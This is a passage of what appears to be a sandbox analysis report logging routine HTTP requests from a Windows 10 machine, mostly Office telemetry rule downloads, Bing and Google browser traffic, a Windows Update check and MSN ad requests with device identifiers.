Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239340418540_1UQTKN6JO04LNXB5Q&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239340418539_1KFG8UNZE5MUR2Y24&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239381714324_1EWZXOYRPJQHWBKEX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239337201808_1NREAF5SJS6TG8GUU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7xDWM6ApMeetRAR&MD=299fFNu4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095140Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3ecff29cd2854316b86dbebd014c1a90&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617973&metered=false&nettype=ethernet&npid=sc-88000045&oemName=lubufd%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=lubufd20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617973&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZyMFkueVF6YQcCvSNBsYpIs4Qd9uYLd1XThPDga/VMIyCy+eMekKh4VSodnFDQ4n9lrkswnaNY8GYQ0LaPFIJzw8cdDovegxQEKXl3uwbQm7avPmaE22/9yfAjtJ4cL7TShgIQ87Ff8bCnRMjTRO0qGPO/W5zq3MPbRDpKMWsFHc5aDZtEbzuZQGnhsSTStKn842VbaQufNbSd6CdSpqbTxIG43Ig/Eeli/gDioys1MWFcaJqBXmLIogUf3OMZs+D0HT1mDwJTd/tcIfn07Ch6BOteR2+4D6lHkPYbyebVpVVGLe8Kh68xjqfktCQLZ9U0Rh7FfPDkLeF1AQDY7HWEQZgAAELvB9khYUktYC0gLd8ASgH6wAW+Pu+FJ/y3GtjMKW1gkUDUXNmQyQ/i1ijgYr1PAYLWHvCbbCNeSNFROlpoxJ+tjtLRfHCFhWVTMy2fdvAkF7XrzG5KCbs8arX4gUeyy890SjhCZJW3sZScGJEhj1V/VDPnpFsrHjgWdZT+g1n11Dclm5ZDUuKklw0SBsjxerjsLpMokLwUA1f5heiBTKw6cXOpu8cOeeNFjCn7oOt+rd4MoMVuW27Az6B3niPuM8EplRl4EDlX12y1OUSE92MXgSoOvapsw8BTUc5+4lbkyXrG6iPfyW8Jg4fRwFdLVV2aUnuGrw8a3BOQmzO7RZrHOLrPV2pdxCjcC6A59cjYEvikJHBycKMqpdZZiGM4rrgCV4YNPFh4SE+82pbzg3hkebn4ChYs7BiDpWq2PwmR137spkVGyusnf8EKexZPvkev4UH2YuI34Fuhcn0LhLyiN6wC8OX7WsGFimLguB2r+nwV5tRi/TjR+ogoMXP2MYzs3iqeg+v9jK1lHhuHTBwFtek9E6rJEqULB+HiBn4Tv0rKe8PDsvKY5KaTlUlWtylYFbndBiTjf/XzLJCjkwQfIZdgB&p=Cache-Control: no-cacheMS-CV: KVxdpzFBRUKFlY1o.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PYwZb5jzUszxXLhoKSvtQDVUCUz2DQQTbtfuHORf_W5QwxBOzlUBs9_EJcUhJgqAU9uX9BQciAkz3E-HbgLnhhz1TwN9WGpscjesnNfGXGZDVfXefq7gYrjtb6kzUmTiaEgS-OCNys-1nUln_W_a46hGPe1h6gVE1L8JE7qshXCdq7tj%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3D88a3a4f4da3e118b1d56c3a0c0aba7aa&TIME=20241207T095141Z&CID=531538185&EID=531538185&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095144Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=fc9a464c968c4ad69b30b43ec9879a37&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617973&metered=false&nettype=ethernet&npid=sc-88000045&oemName=lubufd%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=lubufd20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617973&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZyMFkueVF6YQcCvSNBsYpIs4Qd9uYLd1XThPDga/VMIyCy+eMekKh4VSodnFDQ4n9lrkswnaNY8GYQ0LaPFIJzw8cdDovegxQEKXl3uwbQm7avPmaE22/9yfAjtJ4cL7TShgIQ87Ff8bCnRMjTRO0qGPO/W5zq3MPbRDpKMWsFHc5aDZtEbzuZQGnhsSTStKn842VbaQufNbSd6CdSpqbTxIG43Ig/Eeli/gDioys1MWFcaJqBXmLIogUf3OMZs+D0HT1mDwJTd/tcIfn07Ch6BOteR2+4D6lHkPYbyebVpVVGLe8Kh68xjqfktCQLZ9U0Rh7FfPDkLeF1AQDY7HWEQZgAAELvB9khYUktYC0gLd8ASgH6wAW+Pu+FJ/y3GtjMKW1gkUDUXNmQyQ/i1ijgYr1PAYLWHvCbbCNeSNFROlpoxJ+tjtLRfHCFhWVTMy2fdvAkF7XrzG5KCbs8arX4gUeyy890SjhCZJW3sZScGJEhj1V/VDPnpFsrHjgWdZT+g1n11Dclm5ZDUuKklw0SBsjxerjsLpMokLwUA1f5heiBTKw6cXOpu8cOeeNFjCn7oOt+rd4MoMVuW27Az6B3niPuM8EplRl4EDlX12y1OUSE92MXgSoOvapsw8BTUc5+4lbkyXrG6iPfyW8Jg4fRwFdLVV2aUnuGrw8a3BOQmzO7RZrHOLrPV2pdxCjcC6A59cjYEvikJHBycKMqpdZZiGM4rrgCV4YNPFh4SE+82pbzg3hkebn4ChYs7BiDpWq2PwmR137spkVGyusnf8EKexZPvkev4UH2YuI34Fuhcn0LhLyiN6wC8OX7WsGFimLguB2r+nwV5tRi/TjR+ogoMXP2MYzs3iqeg+v9jK1lHhuHTBwFtek9E6rJEqULB+HiBn4Tv0rKe8PDsvKY5KaTlUlWtylYFbndBiTjf/XzLJCjkwQfIZdgB&p=Cache-Control: no-cacheMS-CV: KVxdpzFBRUKFlY1o.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: 